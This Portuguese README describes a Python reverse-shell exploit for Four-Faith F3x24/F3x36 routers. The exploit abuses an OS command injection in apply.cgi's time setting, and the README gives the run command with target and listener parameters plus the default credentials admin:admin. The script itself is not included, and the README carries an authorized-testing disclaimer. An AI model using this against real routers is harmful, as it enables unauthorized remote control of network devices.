
Um exploit para roteadores Four-Faith para obter um reverse shell
Este é um exploit para os modelos de roteadores Four-Faith F3x24 e F3x36 para obter um reverse shell.
"Os modelos de roteadores Four-Faith F3x24 e F3x36 são afetados por uma vulnerabilidade de injeção de comandos do sistema operacional (SO). Pelo menos a versão de firmware 2.0 permite que atacantes autenticados e remotos executem comandos arbitrários do SO via HTTP ao modificar o horário do sistema por meio do apply.cgi. Além disso, esta versão de firmware possui credenciais padrão que, se não forem alteradas, efetivamente transformariam esta vulnerabilidade em um problema de execução remota de comandos do SO sem autenticação."
Fonte: nist.gov
Este script é baseado em um payload observado pela VulnCheck
Antes de executar o exploit, inicie um servidor TCP na sua máquina.
Em seguida, execute
python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT
Onde
RHOST é o endereço IP remoto. Você também pode adicionar um domínio.LHOST é o IP do seu servidor TCP na sua máquina.LPORT é a porta do seu servidor TCP.USERNAME e PASSWORD são as credenciais do roteador. O padrão é admin:admin.RPORT é a porta remota do roteador. O padrão é 80.Certifique-se de usar este exploit apenas para testes e em ambientes autorizados.
Nunca o use para fins maliciosos.